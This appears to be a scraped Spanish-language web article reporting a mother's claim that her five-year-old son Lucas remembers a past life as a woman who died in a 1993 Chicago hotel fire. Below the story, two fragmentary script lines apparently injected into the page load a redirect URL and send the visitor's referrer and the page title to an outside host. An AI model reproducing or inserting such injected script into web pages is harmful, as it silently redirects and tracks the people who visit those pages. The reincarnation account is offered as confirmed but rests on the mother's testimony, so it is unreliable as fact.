Lucas, el niño de 5 años que recuerda su vida pasada

¿Crees en la reencarnación? Conoce la historia de un niño blanco americano que recuerda ser una mujer negra que murió en 1993.

“Cuando desperté , yo era un bebé y me llamaron; Lucas” narra su mamá, quien afirma que su hijo de cinco años recuerda su vida pasada como una mujer de Chicago que murió en un horrible incendio.

Lucas Ruehlman, de Cincinnati, Ohio, hizo afirmaciones acerca de su vida pasada, su madre, Erika Ruehlman, dice que Lucas “ha recordado ser Pam” una mujer negra de 30 años.

Debido a todo lo que el niño decía, Erika reconstruyó todas las referencias que su hijo hizo a la mujer, que incluso mencionó que él tenía un esposo y que murió de una manera horrorosa en Chicago.

Lucas dijo que recuerda el encuentro con Dios y dice haber sido “empujado hacia abajo por el mismo” y haber despertado como bebé.

Según su madre, la historia de Lucas puede ser que desde tiempo atrás, cuando el niño tenía 2 años probablemente trataba de interpretarlo, ya que no hacía más que nombrar las cosas “PAM” y parecía obsesionado con el nombre.  

Más tarde, Lucas hacía mención de su aparente vida pasada hablando de él como una mujer. Él solía decir: “Cuando era una niña, tenía el cabello negro” ó “Yo solía tener pendientes cuando yo era una niña”.

Al hacer investigaciones, la propia mamá e incluso varios profesionales en el caso, dieron por hecho que efectivamente existió una mujer llamada Pamela Robinson y murió cuando el Paxton Hotel se incendió en 1993.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;